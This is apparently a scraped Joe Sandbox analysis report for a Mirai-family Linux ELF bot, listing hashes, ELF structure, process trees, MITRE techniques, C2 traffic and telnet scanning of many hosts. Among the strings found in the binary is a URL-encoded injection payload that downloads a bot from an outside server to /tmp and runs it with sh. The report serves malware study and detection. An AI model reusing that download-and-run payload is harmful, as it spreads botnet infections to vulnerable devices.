159.210.217.179	unknown	Italy	131090	CAT-IDC-4BYTENET-AS-APCATTELECOMPublicCompanyLtdCATT	false
68.62.136.165	unknown	United States	7922	COMCAST-7922US	false
213.3.4.186	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
178.142.133.19	unknown	Germany	9145	EWETELCloppenburgerStrasse310DE	false
213.37.228.47	unknown	Spain	12357	COMUNITELSPAINES	false
181.182.25.163	unknown	Venezuela	262210	VIETTELPERUSACPE	false
8.19.45.164	unknown	United States	40393	CROSSLINKNETWORKSUS	false
187.119.72.41	unknown	Brazil	26599	TELEFONICABRASILSABR	false
170.96.119.122	unknown	United States	18980	PEACEHEALTHUS	false
178.252.201.61	unknown	Russian Federation	24689	ROSINTEL-ASRU	false
24.35.22.109	unknown	United States	12083	WOW-INTERNETUS	false
178.45.195.233	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
119.182.3.195	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
79.155.35.13	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
119.179.27.241	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
181.205.208.50	unknown	Colombia	27831	ColombiaMovilCO	false
213.91.232.234	unknown	Bulgaria	8866	BTC-ASBULGARIABG	false
65.128.80.235	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	false
101.91.135.122	unknown	China	4812	CHINANET-SH-APChinaTelecomGroupCN	false
212.33.206.110	unknown	Iran (ISLAMIC Republic Of)	43754	ASIATECHIR	false
181.232.94.168	unknown	Colombia	27695	EDATELSAESPCO	false
37.202.175.21	unknown	Iran (ISLAMIC Republic Of)	31549	RASANAIR	false
178.184.52.142	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
178.198.75.95	I46tBvFqsY	Get hash	malicious	Mirai	Browse
94.8.166.143	HetFJEY4fk.elf	Get hash	malicious	Mirai	Browse
94.8.166.143	W47rLMtUVo.elf	Get hash	malicious	Mirai	Browse
90.41.8.20	uvqf3mG6CE.elf	Get hash	malicious	Unknown	Browse
213.167.30.188	dFfaflLgJi.elf	Get hash	malicious	Mirai	Browse
170.26.92.130	a3laDbqx3H	Get hash	malicious	Mirai	Browse
119.2.4.245	cfgpPJdQWm	Get hash	malicious	Gafgyt, Mirai	Browse
170.238.180.200	SRl4y7ZNr0.elf	Get hash	malicious	Mirai	Browse
119.23.55.43	ITCE07zEH3	Get hash	malicious	Mirai	Browse
118.94.183.226	arm	Get hash	malicious	Mirai	Browse
178.95.206.212	jew.x86	Get hash	malicious	Mirai	Browse
178.95.206.212	TPbt74lx6J	Get hash	malicious	Mirai	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CoopercitrusCooperativadeProdutoresRuraisBR	oBtxppgLWB.elf	Get hash	malicious	Mirai	Browse	170.36.34.113
	1oPKLB5wk5.elf	Get hash	malicious	Mirai	Browse	170.40.43.234
	wQb9yR6USY.elf	Get hash	malicious	Mirai	Browse	170.0.2.231
	eOIFF58KfU.elf	Get hash	malicious	Unknown	Browse	170.45.134.16
	xd.arm.elf	Get hash	malicious	Mirai	Browse	170.44.127.12
	xd.x86.elf	Get hash	malicious	Mirai	Browse	170.44.133.235
	FseQ36lw3F.elf	Get hash	malicious	Unknown	Browse	170.35.176.233
	9bmNDy0CjS.elf	Get hash	malicious	Mirai	Browse	170.34.57.7
	x86.elf	Get hash	malicious	Mirai	Browse	170.42.129.212
	9KBPv7C5H4.elf	Get hash	malicious	Mirai	Browse	170.40.43.200
	rh6Ue7txh7.elf	Get hash	malicious	Unknown	Browse	170.41.70.142
	TfHnzbLY7y.elf	Get hash	malicious	Mirai	Browse	170.37.72.48
	eeHcRU4OrS.elf	Get hash	malicious	Mirai	Browse	170.45.109.87
	bXvLuXVSVC.elf	Get hash	malicious	Mirai	Browse	170.37.84.41
	sora.x86.elf	Get hash	malicious	Mirai	Browse	170.45.183.11
	uxtS9aJwEv.elf	Get hash	malicious	Mirai	Browse	170.37.84.46
	xfzak0pHUR.elf	Get hash	malicious	Mirai	Browse	170.37.47.45
	zjnArc1G1S.elf	Get hash	malicious	Mirai	Browse	170.45.158.36
	U7cP8E9xR3.elf	Get hash	malicious	Mirai	Browse	170.42.217.217
	m29dKG8rhc.elf	Get hash	malicious	Mirai	Browse	170.43.75.191
BSKYB-BROADBAND-ASGB	Lf7tF1qhnU.elf	Get hash	malicious	Mirai, Moobot	Browse	188.222.71.132
	arm7.elf	Get hash	malicious	Mirai	Browse	90.220.239.213
	skid.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	5.67.167.14
	skid.x86_64.elf	Get hash	malicious	Mirai, Moobot	Browse	90.214.117.24
	1oPKLB5wk5.elf	Get hash	malicious	Mirai	Browse	94.11.230.127
	Tt4pJQMhy8.elf	Get hash	malicious	Mirai	Browse	94.6.4.163
	5tuUOk0hKz.elf	Get hash	malicious	Mirai	Browse	94.194.150.74
	FVShYxZJpc.elf	Get hash	malicious	Mirai	Browse	94.194.198.187
	9Irkmiibym.elf	Get hash	malicious	Mirai	Browse	94.9.133.18
	QISOVbNi9M.elf	Get hash	malicious	Mirai	Browse	94.8.166.141
	h7TOIMgvTM.elf	Get hash	malicious	Mirai	Browse	94.13.20.73
	0bHPV0WJr8.elf	Get hash	malicious	Mirai	Browse	94.9.108.42
	ku1uI8KKoV.elf	Get hash	malicious	Unknown	Browse	94.13.127.234
	n7BHnNF4CF.elf	Get hash	malicious	Mirai	Browse	90.216.155.71
	xxhFiiKSKy.elf	Get hash	malicious	Mirai	Browse	90.221.106.32
	z8kSnLJt9Y.elf	Get hash	malicious	Mirai	Browse	5.70.237.233
	LFkxJbWFam.elf	Get hash	malicious	Mirai	Browse	90.219.13.231
	M7b6XThK4o.elf	Get hash	malicious	Mirai	Browse	151.226.23.60
	gbDZzW8qUI.elf	Get hash	malicious	Mirai	Browse	90.220.239.228
	sKYHgS34Gd.elf	Get hash	malicious	Mirai	Browse	151.228.76.247
SWISSCOMSwisscomSwitzerlandLtdCH	skid.mips.elf	Get hash	malicious	Mirai, Moobot	Browse	178.194.177.49
	skid.arm.elf	Get hash	malicious	Mirai, Moobot	Browse	164.244.5.106
	sgr0elsN2Z.elf	Get hash	malicious	Mirai	Browse	178.198.75.41
	pitNTFQSoH.elf	Get hash	malicious	Mirai	Browse	213.3.4.146
	YqnGcYyIFN.elf	Get hash	malicious	Mirai	Browse	178.195.108.164
	J4oa31mXHl.elf	Get hash	malicious	Mirai	Browse	213.200.224.22
	wQb9yR6USY.elf	Get hash	malicious	Mirai	Browse	178.197.159.195
	5tuUOk0hKz.elf	Get hash	malicious	Mirai	Browse	85.4.129.180
	h7TOIMgvTM.elf	Get hash	malicious	Mirai	Browse	85.4.81.45
	0bHPV0WJr8.elf	Get hash	malicious	Mirai	Browse	85.0.181.69
	7pmemg0WCP.elf	Get hash	malicious	Unknown	Browse	92.107.3.14
	kuru.arm7.elf	Get hash	malicious	Unknown	Browse	188.60.119.31
	arm5-20231108-0341.elf	Get hash	malicious	Unknown	Browse	46.245.149.99
	xxhFiiKSKy.elf	Get hash	malicious	Mirai	Browse	178.197.62.143
	arm5-20231106-0405.elf	Get hash	malicious	Unknown	Browse	104.66.174.68
	Kb3RZ8k5pZ.elf	Get hash	malicious	Mirai	Browse	83.77.237.254
	pbl0DZaV58.elf	Get hash	malicious	Okiru	Browse	164.242.134.203
	1u31ptQsf6.elf	Get hash	malicious	Okiru	Browse	178.192.115.25
	bHFZDHNHZw.elf	Get hash	malicious	Mirai	Browse	92.107.151.222
	pcXpJqSmzM.elf	Get hash	malicious	Mirai, Moobot	Browse	145.250.150.73

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.537752071363973
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	enYTIDNSNe.elf
File size:	71'888 bytes
MD5:	c172d31c71333fd63839e629a6dabf2b
SHA1:	8598b2bef303f8336fb210cea25a13ac2c807912
SHA256:	7c7290bcd96b542e211208c8799118b9bb352278ba990a029e29646d713a74ae
SHA512:	aeb6a7e92da7bca4bf99a121851e11aceb4bc3e61773c0ad4fea6b8be4112bd9adfb485392661c7e2eaaf711fd7475c3e06f35f06f69d85a28bf3de23e8392ac
SSDEEP:	1536:3ySSvTK0C1vxhc3TJIxz/OCTTkjZXYdnlkk+K6t5dF5jUJ:CTKZ1vrc3TJIxz/OCTTkjZXql6rPpU
TLSH:	EC6349C0A583E8F1DC211939307FAB72AE77E43E2465AAD7E3995B32AB41702910735C
File Content Preview:	.ELF....................d...4...@.......4. ...(.....................................................................Q.td............................U..S.......{$...h....#...[]...$.............U......=.....t..5....D......D.......u........t....h............

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048164
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	71488
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x8048094	0x94	0x1c	0x0	0x6	AX	1
.text	PROGBITS	0x80480b0	0xb0	0xf746	0x0	0x6	AX	16
.fini	PROGBITS	0x80577f6	0xf7f6	0x17	0x0	0x6	AX	1
.rodata	PROGBITS	0x8057820	0xf820	0x1ce0	0x0	0x2	A	32
.ctors	PROGBITS	0x805a504	0x11504	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x805a50c	0x1150c	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x805a540	0x11540	0x1c0	0x0	0x3	WA	32
.bss	NOBITS	0x805a700	0x11700	0x8e0	0x0	0x3	WA	32
.shstrtab	STRTAB	0x0	0x11700	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x11500	0x11500	6.5630	0x5	R E	0x1000	.init .text .fini .rodata
LOAD	0x11504	0x805a504	0x805a504	0x1fc	0xadc	3.5427	0x6	RW	0x1000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Report size exceeds maximum size, please checkout the PCAP download to see all network behavior

System Behavior

Analysis Process: enYTIDNSNe.elf PID: 6207, Parent PID: 6125

General

Start time (UTC):	05:42:59
Start date (UTC):	13/11/2023
Path:	/tmp/enYTIDNSNe.elf
Arguments:	/tmp/enYTIDNSNe.elf
File size:	71888 bytes
MD5 hash:	c172d31c71333fd63839e629a6dabf2b

Start time (UTC):	05:42:59
Start date (UTC):	13/11/2023
Path:	/tmp/enYTIDNSNe.elf
Arguments:	-
File size:	71888 bytes
MD5 hash:	c172d31c71333fd63839e629a6dabf2b

Start time (UTC):	05:42:59
Start date (UTC):	13/11/2023
Path:	/tmp/enYTIDNSNe.elf
Arguments:	-
File size:	71888 bytes
MD5 hash:	c172d31c71333fd63839e629a6dabf2b

Start time (UTC):	05:42:59
Start date (UTC):	13/11/2023
Path:	/tmp/enYTIDNSNe.elf
Arguments:	-
File size:	71888 bytes
MD5 hash:	c172d31c71333fd63839e629a6dabf2b

Analysis Process: enYTIDNSNe.elf PID: 6211, Parent PID: 6209

General

Start time (UTC):	05:42:59
Start date (UTC):	13/11/2023
Path:	/tmp/enYTIDNSNe.elf
Arguments:	-
File size:	71888 bytes
MD5 hash:	c172d31c71333fd63839e629a6dabf2b

Analysis Process: enYTIDNSNe.elf PID: 6213, Parent PID: 6209

General

Start time (UTC):	05:42:59
Start date (UTC):	13/11/2023
Path:	/tmp/enYTIDNSNe.elf
Arguments:	-
File size:	71888 bytes
MD5 hash:	c172d31c71333fd63839e629a6dabf2b

Start time (UTC):	05:42:59
Start date (UTC):	13/11/2023
Path:	/tmp/enYTIDNSNe.elf
Arguments:	-
File size:	71888 bytes
MD5 hash:	c172d31c71333fd63839e629a6dabf2b

Source: enYTIDNSNe.elf	ReversingLabs: Detection: 65%
Source: enYTIDNSNe.elf	Virustotal: Detection: 66%			Perma Link

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Source: unknown	TCP traffic detected without corresponding DNS query: 62.84.212.18
Source: unknown	TCP traffic detected without corresponding DNS query: 62.190.60.18
Source: unknown	TCP traffic detected without corresponding DNS query: 62.140.199.88
Source: unknown	TCP traffic detected without corresponding DNS query: 62.53.162.191
Source: unknown	TCP traffic detected without corresponding DNS query: 62.128.250.18
Source: unknown	TCP traffic detected without corresponding DNS query: 62.34.5.140
Source: unknown	TCP traffic detected without corresponding DNS query: 62.154.28.223
Source: unknown	TCP traffic detected without corresponding DNS query: 62.218.40.215
Source: unknown	TCP traffic detected without corresponding DNS query: 62.118.32.95
Source: unknown	TCP traffic detected without corresponding DNS query: 62.253.160.5
Source: unknown	TCP traffic detected without corresponding DNS query: 62.109.67.208
Source: unknown	TCP traffic detected without corresponding DNS query: 62.218.70.204
Source: unknown	TCP traffic detected without corresponding DNS query: 62.84.219.237
Source: unknown	TCP traffic detected without corresponding DNS query: 62.168.70.183
Source: unknown	TCP traffic detected without corresponding DNS query: 62.223.131.82
Source: unknown	TCP traffic detected without corresponding DNS query: 62.14.158.2
Source: unknown	TCP traffic detected without corresponding DNS query: 62.241.100.188
Source: unknown	TCP traffic detected without corresponding DNS query: 62.150.49.195
Source: unknown	TCP traffic detected without corresponding DNS query: 62.119.225.45
Source: unknown	TCP traffic detected without corresponding DNS query: 62.208.25.7
Source: unknown	TCP traffic detected without corresponding DNS query: 62.144.209.60
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.212.5
Source: unknown	TCP traffic detected without corresponding DNS query: 62.129.225.232
Source: unknown	TCP traffic detected without corresponding DNS query: 62.21.65.148
Source: unknown	TCP traffic detected without corresponding DNS query: 62.113.131.140
Source: unknown	TCP traffic detected without corresponding DNS query: 62.81.180.58
Source: unknown	TCP traffic detected without corresponding DNS query: 62.140.218.175
Source: unknown	TCP traffic detected without corresponding DNS query: 62.17.90.167
Source: unknown	TCP traffic detected without corresponding DNS query: 62.201.25.200
Source: unknown	TCP traffic detected without corresponding DNS query: 62.16.83.88
Source: unknown	TCP traffic detected without corresponding DNS query: 62.93.39.55
Source: unknown	TCP traffic detected without corresponding DNS query: 62.107.44.103
Source: unknown	TCP traffic detected without corresponding DNS query: 62.116.118.210
Source: unknown	TCP traffic detected without corresponding DNS query: 62.147.196.163
Source: unknown	TCP traffic detected without corresponding DNS query: 62.46.250.29
Source: unknown	TCP traffic detected without corresponding DNS query: 62.36.103.237
Source: unknown	TCP traffic detected without corresponding DNS query: 62.79.3.148
Source: unknown	TCP traffic detected without corresponding DNS query: 62.175.118.169
Source: unknown	TCP traffic detected without corresponding DNS query: 62.24.48.73
Source: unknown	TCP traffic detected without corresponding DNS query: 62.116.255.5
Source: unknown	TCP traffic detected without corresponding DNS query: 62.105.8.38
Source: unknown	TCP traffic detected without corresponding DNS query: 62.135.147.129
Source: unknown	TCP traffic detected without corresponding DNS query: 62.255.96.164
Source: unknown	TCP traffic detected without corresponding DNS query: 62.128.38.218
Source: unknown	TCP traffic detected without corresponding DNS query: 62.112.49.55
Source: unknown	TCP traffic detected without corresponding DNS query: 62.248.136.146
Source: unknown	TCP traffic detected without corresponding DNS query: 62.135.75.85
Source: unknown	TCP traffic detected without corresponding DNS query: 62.85.174.134
Source: unknown	TCP traffic detected without corresponding DNS query: 62.88.204.159
Source: unknown	TCP traffic detected without corresponding DNS query: 62.177.186.183

Source: enYTIDNSNe.elf	String found in binary or memory: http://141.98.10.82/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: enYTIDNSNe.elf	String found in binary or memory: http://141.98.10.82/bins/Rakitin.sh

Source: global traffic	TCP traffic: 192.168.2.23:46972 -> 141.98.10.82:9902
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 115.179.42.233:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 96.13.155.174:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 129.243.71.171:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 131.132.136.165:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 155.204.182.144:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 101.232.241.243:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 171.2.128.253:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 93.245.209.92:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 196.177.172.193:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 136.250.255.239:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 149.183.17.182:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 147.156.205.39:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 113.188.26.236:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 105.194.121.30:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 40.62.110.94:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 196.149.173.90:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 187.15.131.222:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 70.175.63.167:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 75.67.176.182:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 105.164.250.158:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 213.26.158.218:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 115.162.61.37:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 57.185.63.218:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 168.65.8.241:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 97.225.154.244:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 202.189.105.171:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 81.39.131.179:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 81.214.11.66:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 167.121.152.209:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 184.244.104.229:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 61.151.43.17:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 84.128.19.202:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 186.219.83.35:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 72.78.224.136:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 86.231.122.109:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 90.211.83.158:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 194.18.202.182:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 193.98.104.133:2323
Source: global traffic	TCP traffic: 192.168.2.23:52037 -> 213.194.160.245:2323

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report enYTIDNSNe.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Snort Signatures

Joe Sandbox Signatures

AV Detection

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

System Behavior

Analysis Process: enYTIDNSNe.elf PID: 6207, Parent PID: 6125

General

Process Activities

Process Forked

Chronological Activities

Analysis Process: enYTIDNSNe.elf PID: 6208, Parent PID: 6207

General

File Activities

File Opened

Chronological Activities

Analysis Process: enYTIDNSNe.elf PID: 6209, Parent PID: 6207

General

Process Activities

Process Forked

Chronological Activities

Analysis Process: enYTIDNSNe.elf PID: 6210, Parent PID: 6209

General

Analysis Process: enYTIDNSNe.elf PID: 6211, Parent PID: 6209

General

Analysis Process: enYTIDNSNe.elf PID: 6213, Parent PID: 6209

General

Linux Analysis Report
enYTIDNSNe.elf